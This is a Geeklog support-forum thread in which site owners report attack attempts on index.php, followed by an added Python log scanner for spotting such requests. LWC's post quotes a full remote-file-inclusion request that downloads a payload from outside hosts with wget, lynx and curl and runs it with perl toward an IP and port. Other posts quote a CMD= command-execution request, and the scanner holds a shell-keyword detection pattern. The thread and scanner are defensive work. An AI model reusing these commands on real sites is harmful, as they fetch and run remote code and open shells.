Welcome to Geeklog, Anonymous Sunday, December 22 2024 @ 11:35 am EST

Geeklog Forums

A backdoor in index.php?

LWC

Forum User
Full Member
Registered: 02/19/04
Posts: 818
My site's spammers seem to try to find a backdoor in index.php.
I seem to be getting frequent visits to
/index.php?page=http://whatever...

For example:
/index.php?page=http://www.bh-net.dk/cmd2.gif?&cmd=cd /tmp;wget www.noti-auto.com.ar/priv8nc;lynx -source www.noti-auto.com.ar/priv8nc >> priv8nc2;curl www.noti-auto.com.ar/priv8nc > priv8nc2;perl priv8nc 200.220.236.26 2232 ;perl priv8nc2 200.220.236.26 2232

Not that index.php even accepts a "page=http://" query...so what gives?

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Not spammers - script kiddies. They don't know what they're doing either. Just ignore them ...

I've stopped counting the attempts to exploit things we don't even run here on geeklog.net, like awstats, phpBB, Coppermine, ...

bye, Dirk

LWC

Forum User
Full Member
Registered: 02/19/04
Posts: 818
Do you think it's personal or do they just come from Google, etc. because of my use of PHP pages?

I have some sub domains and only one of them has a major presence in Google and uses Geeklog. Only that one gets attacked. Its .htaccess file keeps getting bigger and bigger to stop bandwidth waste (I add the referrer of each attempt to a black list). The most disturbing thing is that the blocked visitors don't stop coming back even though they end up in http://127.0.0.1 (your solution)! Why would they come back for that?! I thought it'd be like bouncing an e-mail message, but I read that turned out to be a no-no nowadays (because the spammers don't use real addresses anyway)...

I have more spammers and script kiddies than human visitors and it starts to annoy. What am I, writing a blog for robots...?

Matt

Anonymous
Somebody found some kind of backdoor on my system. I'm not sure if it's a Geeklog hole or a PHP hole. They entered requests like
GET /blog/index.php?CMD=ls+-la

and the commands got executed. They did some nastier stuff after the ls.

When I try the same thing, it doesn't seem to work.

Immediately before the CMD requests, I see a
POST /blog/users.php

so they may have "logged on", but even when I log on, I can't seem to do the same things they did. This looks ugly. Any suggestions?
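The two request shapes quoted in this thread, LWC's `index.php?page=http://...` remote-file-inclusion probe and Matt's `index.php?CMD=ls+-la` command request, are easy to pull out of an Apache access log after the fact. The scanner below is an added example, not code from the thread or from Geeklog. The log lines it reads are constructed samples using reserved documentation addresses (not the hosts quoted above), and the parameter names and shell tokens it flags are the example's own heuristics, assumed to be a reasonable starting point rather than a complete signature set. It also records, as Matt did, whether the same address sent a POST (such as to users.php) before the suspicious GET.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache "combined" log format (not the thread's real logs).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2006:14:02:11 +0100] "GET /index.php?page=http://example.invalid/cmd2.gif?&cmd=cd%20/tmp;wget%20example.invalid/priv8nc HTTP/1.1" 200 4312 "-" "Mozilla/4.0"
198.51.100.23 - - [10/Mar/2006:14:02:40 +0100] "POST /blog/users.php HTTP/1.1" 302 0 "-" "libwww-perl/5.805"
198.51.100.23 - - [10/Mar/2006:14:02:41 +0100] "GET /blog/index.php?CMD=ls+-la HTTP/1.1" 200 1887 "-" "libwww-perl/5.805"
192.0.2.55 - - [10/Mar/2006:14:05:02 +0100] "GET /index.php?topic=news&page=2 HTTP/1.1" 200 9921 "http://example.org/" "Mozilla/5.0"
"""

# Fields of one combined-format line: client address, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Parameter names that injection probes and web shells commonly use (assumed heuristic).
CMD_PARAM_NAMES = {"cmd", "command", "exec", "system"}
# Shell-ish tokens at the start of a value or right after a command separator.
SHELL_HINTS = re.compile(r"(^|[;&|`\n])\s*(wget|curl|lynx|perl|cd|ls|chmod|uname)\b")
# A parameter whose value is a full URL is the classic remote-file-inclusion shape.
URL_PREFIX = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into fields; return None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    params = []
    # Split on '&' only; a ';' inside a value is exactly what we want to keep and inspect.
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    rec["path"] = path
    rec["params"] = params
    return rec


def classify(name, value):
    """Return 'rfi', 'cmd_injection' or None for one decoded query parameter."""
    if URL_PREFIX.match(value):
        return "rfi"
    if name.lower() in CMD_PARAM_NAMES or SHELL_HINTS.search(value):
        return "cmd_injection"
    return None


def scan(log_text):
    """Return one finding per suspicious parameter, with the client's last POST path attached."""
    findings = []
    last_post = {}  # ip -> path of the most recent POST seen from that address
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST":
            last_post[rec["ip"]] = rec["path"]
        for name, value in rec["params"]:
            kind = classify(name, value)
            if kind:
                findings.append({
                    "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                    "kind": kind, "param": name, "value": value,
                    "status": int(rec["status"]),
                    "prior_post": last_post.get(rec["ip"]),
                })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['kind']:14} {f['path']} {f['param']}={f['value']!r}"
              f" status={f['status']} prior_post={f['prior_post']}")
```

Run against the samples, it reports the `page=http://...` probe as `rfi`, the `cmd=` and `CMD=` parameters as `cmd_injection`, and leaves the ordinary `page=2` pagination request alone. A 200 status on a flagged request only tells you the script answered, not that the command ran; that is the point at which the host itself (new files under /tmp, unexpected outbound connections, unknown processes) needs to be checked, as Yvo's shared-hosting experience below suggests.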

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Please send us the details (server logs etc. would certainly help). See here for the procedure.

bye, Dirk

Matt

Anonymous
Info has been sent. Thanks.

Yvo

Anonymous
Same thing (index.php?CMD=(command)) is happening on a FreeBSD 6.0 box with Apache 1.3.34 & PHP 4.4.2.

This has been driving us all week. This is a shared hosting box and it keeps getting IRC bots installed over the file system. The customer running Geeklog has been notified, however if this is a new bug I have no choice but to disable their website this weekend.

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by Yvo: Same thing (index.php?CMD=(command)) is happening on a FreeBSD 6.0 box with Apache 1.3.34 & PHP 4.4.2.

This is the issue that was resolved by Geeklog 1.4.0sr1 and 1.3.11sr4. Please upgrade ASAP (to 1.3.11sr5 / 1.4.0sr2, of course).

bye, Dirk